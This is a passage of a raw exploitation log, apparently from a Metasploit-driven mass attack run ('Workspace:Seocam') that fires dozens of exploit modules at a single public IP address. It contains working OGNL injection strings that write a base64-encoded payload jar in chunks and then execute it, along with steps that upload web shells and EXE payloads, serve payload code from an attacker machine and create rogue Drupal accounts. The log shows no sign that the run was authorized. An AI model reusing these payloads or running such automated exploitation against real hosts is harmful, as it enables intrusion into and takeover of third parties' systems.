  1066. [*] [2016.08.17-21:15:41] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('Nv6R7tLGQARhbk6Ly7c4Zn06bWzJS0Iq/gkfIu00Rduqly497oTqY1R8B//MCn43568p06klR1HxL/jeBFvWFHAAFd/HD8ih+m1zpUXpZEY+igYrlSLVuGL8FZ9FmDeFt3wz55TOr6NWbJPpMF9/QwiNH5vpzWZ6/PLvKv4D/6niv/Df5D95rE5wMPLPAcrMHhU7p+iJ6TmXXSblZwLOT02erSk16eOpyHO/DmuTmaJ0SDooyuppfnX1fJIp6pCi2o20QeyZaSKP85n1/6j4Ie5V8SPOCsW5UuQCq/Ai/JrgalXcJ4AqoCDkEhqxt8JwjHyTEq7bcwxRhu2nyraltt1M91LC9ardnIl39cnk+LUq+ASRzDzpedpyPMutsLy6OmsiANfcqNWfjlGoyN0Ur5Ha2topaGKUomsbOE93J2KGQ4I9Lfh5CKiCRMILMr6rCkFBUYUiQaVMzs/7PO3V2KyKGlUoFkrI42mXdiZZY3+hyIucjp60NeCF8H4ztxPY')),#f.close(),#a='Bev'
  1067. [*] [2016.08.17-21:15:41] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('uLaEUgoqoUyFx+EJFZ4CyoC+WrtHhVfgVYqi2g2JlAq/4SQi1piDxPNr8LoqTOMEWppvdSO2SYU34E1V0PBuVSiHx1RhOkMhMR0SZlBo19BqJss5i2WYMbUkdXdTCAm6MJuKkTBHFeYK83h1iCocKsynYBUOU4UFwuF8doQqHMmoFgpH8W2YSqpl16TIqyRhkSpUCJWqUCVUq/AoS1TCma/GNvvI7xyLCs7PXDmNxCDxx/WbeanpsXrNXHiNp7pm0j778bz8fNxqOSut/lR+BhsPo7a8U4n6lFaD8U4PF2xGpLTZlzTYcWaEGxoKggQMKoEpSo7VB9XhZEs7dwyOlasG5cTHGtN2fbTezkXzoo/tVfLbNTK/10nMKtzOcU/mjyUtmwQpIlrZjmQL6T5GAI7ZYfb2eZ1lIG4mKfbdhpWa2lKCrt9gW8l+h/KC00MWCBfu+fy9m+LcpB0enthOFYYOpM1ea/PkvjCbshYVymLcUzYYKStF0Zn0WPGRhAhL')),#f.close(),#a='Bev'
  1068. [*] [2016.08.17-21:15:42] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('C2A4SJxL/5+GcqLZp42fNaUccyM7oUwebJu0PYCWmsihNhvJfrOtmyGaCiIusvPt8/9zuF+4Yja0kTZTjmfZsvCURjfg2oyyruKmLLszcUALky9MC0/+onBznZUm5JXhg/1k4Fd5ylvTn3ISHIEKx0BuE5oQjtljdnNKcjGEcMEPp7wjUmDMpI+iCaSyh+T0RGpCOZ0ZPlBcMWhjOm2lc6BlE9K3yUHnt5OmSd9SYvg0Fk71Iqgt1TiYcCYwsNyykqbB3XdHVzt9HE6b8hFHyY4Iev0XwifCH//F5b3JlzttdifJ+rUeBlZYx5q1RKm8eQoXy3J1ssBD8oxEajN1CQgnFIiudQcZXtKAkXDcVouSCTl/aZ9X3KgadaTdrJrfGW+xHZMULHAFDx3AHD6LI378Nq9asu7s/g12NqXKpEfu3GxO3YU+4paT4cLrlrPFSijaUuMNIMLsnD9MaQ5Zqm4r7RWNI/9Hxs/ZVGH8OQcqxE2T+9tA2J0CRozrE9ks')),#f.close(),#a='Bev'
  1069. [-] [2016.08.17-21:15:51] [0244] Exploit aborted due to failure: no-access: 166.62.27.177:80 - Login failed
  1070. [*] [2016.08.17-21:15:52] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('nwmvjVzmJeSJTd+sPOedEHuFP18LR2RRjAqm4zaGNn8xm4Pehlt1z8lZV2RDv/trBGmB9k0uwz76YKcCnCVVoKtzCSwOT9BozocO2H65j+onIx1v5ZYdkFyDlUxmjcU4JObfzclBXq3sTyYprxbFze5EymzwvuaaCgUaidf88Z1mQWOraSrkyc051NOn/lLj6jtlDjSlKOumYlO6j/HG/QBJlRHkVfr8IHA9yBxM2A7RFvv67R4Oi1xrRUWhx7BbKGPnLB0wL+g3kvakpJ8Lakr6ou3+buLrs/rcD88spoYeg7BhAzXs4YZCXQ53ixySlAt7qQTVO1Mq3n4xq/5HCzAJpZRIxc1BLqEcMU0cUU0HKKWOxXy6H28MvWgd8Tu3ML+5riyQNFMbuQoGYvzU8ag0cAA0udTKxvvqZotaEY6FxtZTm5uiq/b/YJh367HRbA2Y6QbDzmt48mEKcA+HgQiPAIAfZnObTKvZ3Bi7M30NuPOT2fkp91wB5N+eaPw5')),#f.close(),#a='Bev'
  1071. [+] [2016.08.17-21:15:52] Workspace:Seocam Progress:249/337 (73%) [245/332] 166.62.27.177:80 - HP Intelligent Management Center BIMS UploadServlet Directory Traversal
  1072. [-] [2016.08.17-21:15:52] No bind payloads available for exploit/windows/http/hp_imc_bims_upload)
  1073. [-] [2016.08.17-21:15:52] [0245] Exploit failed: A payload has not been selected.
  1074. [*] [2016.08.17-21:15:58] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('7abRjPy+YgRwt/v7dxB+Ab8Ega/FLRAgEBDPGQOhawR8zeUgtoyBn9aBqgxIZTVltRmQMxDUFBoyUNRapakZKI6IurgHSip1MQMlPJRWamUZmBbx6/49cJ6maeWjMD0S0AMZCHWOwYyuLFY+mMn4Znn4RkCPSLqUgdkulC7p/hGYE5GrdL8uj8JcF+28zkrtEJ3YODQD82l9mLYgA4ePwhF1AbpgslIocAOeSzehgBgfhSMzsLAzx4TMLycyIU9lIuiSD2pHMXnF21TzukgvykA4A4s6q6r1IpelCq2S6GukoeptMLNKq3HBGUyrpScuzNFIIHv49pjx28Xe7Rgc26UrI7AkolbqKiM7Tiet1o3C8dK9sLTLp50wCpFol6gti3b5dWJxZrTLNUg0AydGivXiDJxEOuf5ZJqnwymjUE9PZ3T59CJ651Ljpwq904PRSImvrjRUqpfctwOO89WVhcrKlB1wpF4SKl1MutkGgSGYmd0tnw4NhG1rGQ7te3Fr')),#f.close(),#a='Bev'
  1075. [+] [2016.08.17-21:15:58] Workspace:Seocam Progress:250/337 (74%) [246/332] 166.62.27.177:80 - HP LoadRunner EmulationAdmin Web Service Directory Traversal
  1076. [-] [2016.08.17-21:15:58] No bind payloads available for exploit/windows/http/hp_loadrunner_copyfiletoserver)
  1077. [-] [2016.08.17-21:15:58] [0246] Exploit failed: A payload has not been selected.
  1078. [+] [2016.08.17-21:15:59] Workspace:Seocam Progress:251/337 (74%) [247/332] 166.62.27.177:80 - Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution
  1079. [*] [2016.08.17-21:15:59] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1080. [*] [2016.08.17-21:15:59] Using a random high port (32251) for 166.62.27.177
  1081. [*] [2016.08.17-21:15:59] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('KY2PDgkn69IeuNqzEGtLHobG62B1OczQVor3wqldvmFYRcw16TJtT+Pt6bRt7hyCBZEgyRXw5GplodqYM1eUDLQThBIJsoxrCEx0wbzLTpeG5lmPxzAvhnC4UotqHVkHkCu1tazpSJDM4i6UkLwdyobhjEjRMHRG1CF4QFf2wGW6op3pGmz2GHSR+snnztLWZeDsETgnUjQEawnAs+hJY3Cua5/1GTgvUqwZo7BBi3lilkOcxURPSr3YFZLtYDKOaXkvuyNFY7CR3K2HeThJD+6B8jFIkFuF5BE4P1I8xJxs6uJdMlKil2Sgl0xLU4rxWeR4NPWRi3i+xGbfAx3aBcxNOpDlxiaFloNDGi2HpS5nAY8z1w1U1rTL4/3QT/+YjG/x/WAT8hKRFk5EHYPNubjQBigeKrVB17290NC2jMCFHncXkW0ipa736KXkSOV6Ka3o4uKo6yxvj4FIWD6pF+nE8yXMs146Ap/aDYJwvNAlnA0tNF8kXAKrKQ09S/9F')),#f.close(),#a='Bev'
  1082. [*] [2016.08.17-21:15:59] [0247] Started bind handler
  1083. [*] [2016.08.17-21:15:59] [0247] Sending payload
  1084. [*] [2016.08.17-21:16:00] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('yk2rKWM9B897CQnW0plEc1NFjqVLmSWPF8o7rRw6VRw54rQyuEeO+Kt1fwY+3VUXEG6EMl3U/b4QpZjLhva9xWmpzst5TCxAJH4FL4DGv1Vlyb1PxIpofmUMLu+qHIGtEf8YXEF0r+SkNAZX0fIzGfjsGFxNOrqmi82rfY7M67sXPj8CX+Bg+GJErn4YTmA2vlQXDAWJKYWSF+XLL1dUoK74QkF23q90RYivr+4H277v+SGYk5PyayRhtSclmdfLm1+nsAho38hZ+vI8S3/TDbVg1tR+uqliS4vZkNM4DY/BNtbUdRn41m63BjxOFeLaSZp/CV7OVoqzSCUCza3YPAzXb4N5WdaGYTtnyhs85ipG4cbmyocn396Uf7sHZDLYzF20+/YuV/0K/zqVpVNJVJibQ7MYKugpBfo2kLUdQ+DXsrbOPXwFXs0+XExMizQvJLzfacFWitWd20DnnFRVSaQotbaSCndeB35src69fw1ez76/i14HaL5tDG4mwrc0')),#f.close(),#a='Bev'
  1085. [*] [2016.08.17-21:16:01] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('E56hlsoqH+W8Wzs5CqrExcPwXfJ3xvO9bdBA08URUfs+e9IPOEnue0u7LbuZS4z+0L8DVGaAqqu+iw5u52zmFsVbO4f23TMGu4jS7ojoq/OH/PxgBxwR8os7QdXFYRjOwB2dulgZIp+4MwM/6tzqpzB6wc2yhCLDSLNivAFvemJgkMSQ6exDen9iRVntHKrPZWfzeDq2VJRFMjBy8rwb4EpXp5fOE8+rEyt8IUI32kKqvosdPFfeg/TqbtJ1i+4PiUvm3ARKSBTPIyOExDoxx3uANlKIyjJFfJgAJQYs4YUYXzLnRloG3FOWZatE/D/Hvps5fQhWE70xkvWUCqJ+D72qq5hDkt5LDM1hQu4yJPp3QilzyAejQyBWtFQQb2OUnQlHMRmkhd+fdbrfLQ3k52JF1FOLDL/d3+jUu84LcJx23yj8eBjuz8ADd8CD2kO0uwN+ov10GB4ku90B1w/Tbo+7bNQedm+3e0kC/gtQSwMEFAAAAAAA5qkRSQAAAAAA')),#f.close(),#a='Bev'
  1086. [-] [2016.08.17-21:16:02] [0247] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Something went wrong.
  1087. [+] [2016.08.17-21:16:02] Workspace:Seocam Progress:252/337 (74%) [248/332] 166.62.27.177:80 - Graphite Web Unsafe Pickle Handling
  1088. [-] [2016.08.17-21:16:02] No bind payloads available for exploit/unix/webapp/graphite_pickle_exec)
  1089. [-] [2016.08.17-21:16:02] [0248] Exploit failed: A payload has not been selected.
  1090. [+] [2016.08.17-21:16:03] Workspace:Seocam Progress:253/337 (75%) [249/332] 166.62.27.177:80 - Zabbix 2.0.8 SQL Injection and Remote Code Execution
  1091. [*] [2016.08.17-21:16:03] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('AAAAAAAAAAkAAABNRVRBLUlORi9QSwMEFAAAAAgA5qkRSX6aFUZiAAAAkQAAABQAAABNRVRBLUlORi9NQU5JRkVTVC5NRvNNzMtMSy0u0Q1LLSrOzM+zUjDUM+Dl8k3MzNN1zkksLrZSyE0tSSwuyMnPLNELSKzMyU9M4eUKSC3KzSwGaQAqSMzJ0S1ACPBy8XL5JeamouhMSSzBJq4PNVEvGWQXSAUAUEsBAhQAFAAAAAAA5qkRSVhX/BoUAAAAFAAAAA4AAAAAAAAAAAAAAAAAAAAAAG1ldGFzcGxvaXQuZGF0UEsBAhQAFAAAAAAA5qkRSQAAAAAAAAAAAAAAAAsAAAAAAAAAAAAAAAAAQAAAAG1ldGFzcGxvaXQvUEsBAhQAFAAAAAgA5qkRSXB7Ld9OEQAAQSEAABgAAAAAAAAAAAAAAAAAaQAAAG1ldGFzcGxvaXQvUGF5bG9hZC5jbGFzc1BLAQIUABQAAAAAAOapEUkAAAAAAAAAAAAAAAAJ')),#f.close(),#a='Bev'
  1092. [-] [2016.08.17-21:16:03] No bind payloads available for exploit/linux/http/zabbix_sqli)
  1093. [-] [2016.08.17-21:16:03] [0249] Exploit failed: A payload has not been selected.
  1094. [*] [2016.08.17-21:16:03] [0249] Cleaning script remnants
  1095. [*] [2016.08.17-21:16:04] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('AAAAAAAAAAAAAAAAAO0RAABNRVRBLUlORi9QSwECFAAUAAAACADmqRFJfpoVRmIAAACRAAAAFAAAAAAAAAAAAAAAAAAUEgAATUVUQS1JTkYvTUFOSUZFU1QuTUZQSwUGAAAAAAUABQA0AQAAqBIAAAAA')),#f.close(),#a='Bev'
  1096. [!] [2016.08.17-21:16:04] [0249] Unable to remove script
  1097. [+] [2016.08.17-21:16:04] Workspace:Seocam Progress:254/337 (75%) [250/332] 166.62.27.177:80 - Synology DiskStation Manager SLICEUPLOAD Remote Command Execution
  1098. [-] [2016.08.17-21:16:04] No bind payloads available for exploit/linux/http/synology_dsm_sliceupload_exec_noauth)
  1099. [-] [2016.08.17-21:16:04] [0250] Exploit failed: A payload has not been selected.
  1100. [*] [2016.08.17-21:16:04] [0242] Attempting to execute: #q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),#q.setAccessible(true),#q.set(null,true),#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),#q.setAccessible(true),#q.set(null,false),#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('s80RuD.jar'+#a).toURI().toURL()}),#a='vSpL',#c=#cl.loadClass('metasploit.Payload'),#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(null,new java.lang.Object[]{new java.lang.String[0]})
  1101. [+] [2016.08.17-21:16:05] Workspace:Seocam Progress:255/337 (75%) [251/332] 166.62.27.177:80 - Zimbra Collaboration Server LFI
  1102. [*] [2016.08.17-21:16:05] Using a random high port (27181) for 166.62.27.177
  1103. [*] [2016.08.17-21:16:05] [0251] Started bind handler
  1104. [*] [2016.08.17-21:16:05] [0251] Getting login credentials...
  1105. [!] [2016.08.17-21:16:07] [0242] This exploit may require manual cleanup of 's80RuD.jarnull' on the target
  1106. [!] [2016.08.17-21:16:07] [0242] This exploit may require manual cleanup of 's80RuD.jarBev' on the target
  1107. [+] [2016.08.17-21:16:08] Workspace:Seocam Progress:256/337 (75%) [252/332] 166.62.27.177:80 - ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload
  1108. [*] [2016.08.17-21:16:08] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1109. [*] [2016.08.17-21:16:08] Using a random high port (5895) for 166.62.27.177
  1110. [*] [2016.08.17-21:16:08] [0252] Started bind handler
  1111. [*] [2016.08.17-21:16:08] [0252] Uploading JSP to execute the payload
  1112. [-] [2016.08.17-21:16:16] [0252] Exploit aborted due to failure: unknown: 166.62.27.177:80 - JSP upload failed
  1113. [+] [2016.08.17-21:16:16] Workspace:Seocam Progress:257/337 (76%) [253/332] 166.62.27.177:80 - GE Proficy CIMPLICITY gefebt.exe Remote Code Execution
  1114. [*] [2016.08.17-21:16:16] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1115. [*] [2016.08.17-21:16:16] Using a random high port (6932) for 166.62.27.177
  1116. [-] [2016.08.17-21:16:16] Fatal: Could not select a callback port when bind connections are specified
  1117. [*] [2016.08.17-21:16:17] [0253] Started bind handler
  1118. [*] [2016.08.17-21:16:20] [0253] BCLs available at \\192.168.100.20\Fal\vzQ{i}.bcl
  1119. [*] [2016.08.17-21:16:20] [0253] Using URL: http://0.0.0.0:80/
  1120. [*] [2016.08.17-21:16:20] [0253] Local IP: http://192.168.100.20:80/
  1121. [*] [2016.08.17-21:16:20] [0253] Server started.
  1122. [*] [2016.08.17-21:16:20] [0253] Executing BCL code vzQ0.bcl to drop final payload...
  1123. [-] [2016.08.17-21:16:20] [0253] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Unknown error
  1124. [*] [2016.08.17-21:16:21] [0253] Server stopped.
  1125. [+] [2016.08.17-21:16:21] Workspace:Seocam Progress:258/337 (76%) [254/332] 166.62.27.177:80 - FlashChat Arbitrary File Upload
  1126. [*] [2016.08.17-21:16:21] Using a random high port (32173) for 166.62.27.177
  1127. [*] [2016.08.17-21:16:21] [0254] Started bind handler
  1128. [*] [2016.08.17-21:16:21] [0254] Uploading malicious file...
  1129. [-] [2016.08.17-21:16:22] [0254] Exploit aborted due to failure: not-found: 166.62.27.177:80 - No upload.php found
  1130. [+] [2016.08.17-21:16:23] Workspace:Seocam Progress:259/337 (76%) [255/332] 166.62.27.177:80 - WebTester 5.x Command Execution
  1131. [-] [2016.08.17-21:16:24] No bind payloads available for exploit/unix/webapp/webtester_exec)
  1132. [-] [2016.08.17-21:16:24] [0255] Exploit failed: A payload has not been selected.
  1133. [+] [2016.08.17-21:16:24] Workspace:Seocam Progress:260/337 (77%) [256/332] 166.62.27.177:80 - ProcessMaker Open Source Authenticated PHP Code Execution
  1134. [*] [2016.08.17-21:16:24] Using a random high port (6284) for 166.62.27.177
  1135. [*] [2016.08.17-21:16:24] [0256] Started bind handler
  1136. [*] [2016.08.17-21:16:24] [0256] Authenticating as user 'admin'
  1137. [-] [2016.08.17-21:16:26] [0256] Authenticating as user 'admin' failed
  1138. [-] [2016.08.17-21:16:26] [0256] Exploit aborted due to failure: no-access: 166.62.27.177:80 - Authentication failed
  1139. [+] [2016.08.17-21:16:26] Workspace:Seocam Progress:261/337 (77%) [257/332] 166.62.27.177:80 - Kaseya uploadImage Arbitrary File Upload
  1140. [*] [2016.08.17-21:16:26] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1141. [*] [2016.08.17-21:16:26] Using a random high port (18406) for 166.62.27.177
  1142. [*] [2016.08.17-21:16:27] [0257] Started bind handler
  1143. [*] [2016.08.17-21:16:27] [0257] Getting cookie...
  1144. [-] [2016.08.17-21:16:27] [0251] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (166.62.27.177:80).
  1145. [-] [2016.08.17-21:16:27] [0257] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Failed to get cookie
  1146. [+] [2016.08.17-21:16:27] Workspace:Seocam Progress:262/337 (77%) [258/332] 166.62.27.177:80 - Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload
  1147. [*] [2016.08.17-21:16:28] Using a random high port (12804) for 166.62.27.177
  1148. [*] [2016.08.17-21:16:28] [0258] Started bind handler
  1149. [*] [2016.08.17-21:16:28] [0258] Uploading PHP to Up.Time server
  1150. [*] [2016.08.17-21:16:28] [0258] Uploading payload oaMVF.php
  1151. [+] [2016.08.17-21:16:28] Workspace:Seocam Progress:263/337 (78%) [259/332] 166.62.27.177:80 - MediaWiki Thumb.php Remote Command Execution
  1152. [*] [2016.08.17-21:16:28] Using a random high port (4586) for 166.62.27.177
  1153. [*] [2016.08.17-21:16:28] [0259] Started bind handler
  1154. [*] [2016.08.17-21:16:28] [0259] Grabbing version and login CSRF token...
  1155. [-] [2016.08.17-21:16:28] [0258] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Upload failed
  1156. [+] [2016.08.17-21:16:29] Workspace:Seocam Progress:264/337 (78%) [260/332] 166.62.27.177:80 - Symantec Workspace Streaming ManagementAgentServer.putFile XMLRPC Request Arbitrary File Upload
  1157. [*] [2016.08.17-21:16:29] Using a random high port (7768) for 166.62.27.177
  1158. [*] [2016.08.17-21:16:29] [0260] Started bind handler
  1159. [*] [2016.08.17-21:16:29] [0260] Leaking the JBoss deployment directory...
  1160. [*] [2016.08.17-21:16:30] [0259] Nix platform detected: Apache/2.4.23.
  1161. [-] [2016.08.17-21:16:30] [0259] Exploit aborted due to failure: unexpected-reply: Couldn't find login token. Is URI set correctly?
  1162. [+] [2016.08.17-21:16:30] Workspace:Seocam Progress:265/337 (78%) [261/332] 166.62.27.177:80 - SkyBlueCanvas CMS Remote Code Execution
  1163. [-] [2016.08.17-21:16:31] No bind payloads available for exploit/unix/webapp/skybluecanvas_exec)
  1164. [-] [2016.08.17-21:16:31] [0261] Exploit failed: A payload has not been selected.
  1165. [-] [2016.08.17-21:16:31] [0260] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Failed to disclose the JBoss deployment directory
  1166. [+] [2016.08.17-21:16:31] Workspace:Seocam Progress:266/337 (78%) [262/332] 166.62.27.177:80 - Horde Framework Unserialize PHP Code Execution
  1167. [*] [2016.08.17-21:16:31] Using a random high port (41127) for 166.62.27.177
  1168. [*] [2016.08.17-21:16:31] [0262] Started bind handler
  1169. [*] [2016.08.17-21:16:31] [0262] Testing injection...
  1170. [+] [2016.08.17-21:16:31] Workspace:Seocam Progress:267/337 (79%) [263/332] 166.62.27.177:80 - FreePBX config.php Remote Code Execution
  1171. [-] [2016.08.17-21:16:32] No bind payloads available for exploit/unix/webapp/freepbx_config_exec)
  1172. [-] [2016.08.17-21:16:32] [0263] Exploit failed: A payload has not been selected.
  1173. [+] [2016.08.17-21:16:32] Workspace:Seocam Progress:268/337 (79%) [264/332] 166.62.27.177:80 - Fritz!Box Webcm Unauthenticated Command Injection
  1174. [-] [2016.08.17-21:16:32] No bind payloads available for exploit/linux/http/fritzbox_echo_exec)
  1175. [-] [2016.08.17-21:16:32] [0264] Exploit failed: A payload has not been selected.
  1176. [+] [2016.08.17-21:16:33] Workspace:Seocam Progress:269/337 (79%) [265/332] 166.62.27.177:80 - Linksys E-Series TheMoon Remote Command Injection
  1177. [-] [2016.08.17-21:16:33] No bind payloads available for exploit/linux/http/linksys_themoon_exec)
  1178. [-] [2016.08.17-21:16:33] [0265] Exploit failed: A payload has not been selected.
  1179. [+] [2016.08.17-21:16:33] Workspace:Seocam Progress:270/337 (80%) [266/332] 166.62.27.177:80 - AlienVault OSSIM SQL Injection and Remote Code Execution
  1180. [-] [2016.08.17-21:16:33] No bind payloads available for exploit/linux/http/alienvault_sqli_exec)
  1181. [-] [2016.08.17-21:16:33] [0266] Exploit failed: A payload has not been selected.
  1182. [*] [2016.08.17-21:16:33] [0266] Cleaning up
  1183. [+] [2016.08.17-21:16:34] Workspace:Seocam Progress:271/337 (80%) [267/332] 166.62.27.177:80 - ActualAnalyzer 'ant' Cookie Command Execution
  1184. [-] [2016.08.17-21:16:35] No bind payloads available for exploit/unix/webapp/actualanalyzer_ant_cookie_exec)
  1185. [-] [2016.08.17-21:16:35] [0267] Exploit failed: A payload has not been selected.
  1186. [+] [2016.08.17-21:16:35] Workspace:Seocam Progress:272/337 (80%) [268/332] 166.62.27.177:80 - Wordpress Creative Contact Form Upload Vulnerability
  1187. [*] [2016.08.17-21:16:35] Using a random high port (42406) for 166.62.27.177
  1188. [*] [2016.08.17-21:16:35] [0268] Started bind handler
  1189. [-] [2016.08.17-21:16:36] [0268] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Unable to deploy payload, server returned 404
  1190. [+] [2016.08.17-21:16:36] Workspace:Seocam Progress:273/337 (81%) [269/332] 166.62.27.177:80 - WordPress RevSlider File Upload and Execute Vulnerability
  1191. [*] [2016.08.17-21:16:36] Using a random high port (23951) for 166.62.27.177
  1192. [*] [2016.08.17-21:16:37] [0269] Started bind handler
  1193. [-] [2016.08.17-21:16:37] [0262] Exploit aborted due to failure: not-vulnerable: 166.62.27.177:80 - Target isn't vulnerable, exiting...
  1194. [+] [2016.08.17-21:16:37] Workspace:Seocam Progress:274/337 (81%) [270/332] 166.62.27.177:80 - WordPress WP Symposium 14.11 Shell Upload
  1195. [*] [2016.08.17-21:16:37] Using a random high port (43971) for 166.62.27.177
  1196. [*] [2016.08.17-21:16:37] [0270] Started bind handler
  1197. [*] [2016.08.17-21:16:37] [0270] Preparing payload
  1198. [*] [2016.08.17-21:16:37] [0270] Uploading payload to /wp-content/plugins/wp-symposium/server/php/tNoLQHvWyP/tNoLQHvWyP.php
  1199. [-] [2016.08.17-21:16:37] [0269] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Unable to deploy payload, server returned 404
  1200. [+] [2016.08.17-21:16:38] Workspace:Seocam Progress:275/337 (81%) [271/332] 166.62.27.177:80 - WordPress WP EasyCart Unrestricted File Upload
  1201. [*] [2016.08.17-21:16:38] Using a random high port (31573) for 166.62.27.177
  1202. [*] [2016.08.17-21:16:38] [0271] Started bind handler
  1203. [*] [2016.08.17-21:16:38] [0271] EC authentication attack is enabled
  1204. [*] [2016.08.17-21:16:38] [0271] Preparing payload...
  1205. [*] [2016.08.17-21:16:38] [0271] Uploading payload to /wp-content/plugins/wp-easycart/products/banners/eIvnODBQVf_ea2c2ab014827d21730ebc0eda2c4cbc.php
  1206. [-] [2016.08.17-21:16:57] [0270] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (166.62.27.177:80).
  1207. [+] [2016.08.17-21:16:58] Workspace:Seocam Progress:276/337 (81%) [272/332] 166.62.27.177:80 - WordPress Pixabay Images PHP Code Upload
  1208. [*] [2016.08.17-21:16:58] Using a random high port (9589) for 166.62.27.177
  1209. [-] [2016.08.17-21:16:58] Fatal: Could not select a callback port when bind connections are specified
  1210. [*] [2016.08.17-21:16:58] [0272] Started bind handler
  1211. [-] [2016.08.17-21:16:58] [0271] Exploit aborted due to failure: unreachable: No response from the target
  1212. [+] [2016.08.17-21:16:59] Workspace:Seocam Progress:277/337 (82%) [273/332] 166.62.27.177:80 - Wordpress InBoundio Marketing PHP Upload Vulnerability
  1213. [*] [2016.08.17-21:16:59] Using a random high port (20895) for 166.62.27.177
  1214. [*] [2016.08.17-21:16:59] [0273] Started bind handler
  1215. [-] [2016.08.17-21:16:59] [0272] Exploit aborted due to failure: no-target: 166.62.27.177:80 - / does not seeem to be WordPress site
  1216. [+] [2016.08.17-21:17:00] Workspace:Seocam Progress:278/337 (82%) [274/332] 166.62.27.177:80 - Oracle Event Processing FileUploadServlet Arbitrary File Upload
  1217. [*] [2016.08.17-21:17:00] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1218. [*] [2016.08.17-21:17:00] Using a random high port (6611) for 166.62.27.177
  1219. [*] [2016.08.17-21:17:00] [0274] Started bind handler
  1220. [*] [2016.08.17-21:17:00] [0274] Generating payload and mof file...
  1221. [*] [2016.08.17-21:17:02] [0274] Uploading the exe payload idpEIUXK.exe...
  1222. [-] [2016.08.17-21:17:02] [0274] Unexpected answer, trying anyway...
  1223. [*] [2016.08.17-21:17:02] [0274] Uploading the MOF file usxurExUA.mof
  1224. [+] [2016.08.17-21:17:04] Workspace:Seocam Progress:279/337 (82%) [275/332] 166.62.27.177:80 - F5 iControl Remote Root Command Execution
  1225. [-] [2016.08.17-21:17:05] No bind payloads available for exploit/linux/http/f5_icontrol_exec)
  1226. [-] [2016.08.17-21:17:05] [0275] Exploit failed: A payload has not been selected.
  1227. [+] [2016.08.17-21:17:05] Workspace:Seocam Progress:280/337 (83%) [276/332] 166.62.27.177:80 - ElasticSearch Dynamic Script Arbitrary Java Execution
  1228. [*] [2016.08.17-21:17:05] Using a random high port (26774) for 166.62.27.177
  1229. [*] [2016.08.17-21:17:05] [0276] Started bind handler
  1230. [*] [2016.08.17-21:17:05] [0276] Trying to execute arbitrary Java...
  1231. [*] [2016.08.17-21:17:05] [0276] Trying to execute 'System.getProperty("java.version")'...
  1232. [-] [2016.08.17-21:17:06] [0276] 166.62.27.177:80 responded with HTTP code 404 (with a body)
  1233. [*] [2016.08.17-21:17:06] [0276] No results for the Java test
  1234. [-] [2016.08.17-21:17:06] [0276] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Java has not been executed, aborting...
  1235. [+] [2016.08.17-21:17:06] Workspace:Seocam Progress:281/337 (83%) [277/332] 166.62.27.177:80 - Drupal HTTP Parameter Key/Value SQL Injection
  1236. [*] [2016.08.17-21:17:06] Using a random high port (41791) for 166.62.27.177
  1237. [*] [2016.08.17-21:17:06] [0277] Started bind handler
  1238. [*] [2016.08.17-21:17:06] [0277] Testing page
  1239. [*] [2016.08.17-21:17:07] [0277] form_build_id:
  1240. [*] [2016.08.17-21:17:07] [0277] form_token:
  1241. [*] [2016.08.17-21:17:07] [0277] password hash: $P\$8jrqPZSrj3VcsSPrRUPJlt3G21KG9C0
  1242. [*] [2016.08.17-21:17:07] [0277] Creating new user IqSmxgInLQ:xbyCbVxNkh
  1243. [*] [2016.08.17-21:17:08] [0277] Logging in as IqSmxgInLQ:xbyCbVxNkh
  1244. [-] [2016.08.17-21:17:09] [0277] Exploit aborted due to failure: unknown: No response or response body, bailing.
  1245. [+] [2016.08.17-21:17:09] Workspace:Seocam Progress:282/337 (83%) [278/332] 166.62.27.177:80 - AlienVault OSSIM av-centerd Command Injection
  1246. [-] [2016.08.17-21:17:09] No bind payloads available for exploit/linux/ids/alienvault_centerd_soap_exec)
  1247. [-] [2016.08.17-21:17:09] [0278] Exploit failed: A payload has not been selected.
  1248. [+] [2016.08.17-21:17:10] Workspace:Seocam Progress:283/337 (83%) [279/332] 166.62.27.177:80 - Centreon SQL and Command Injection
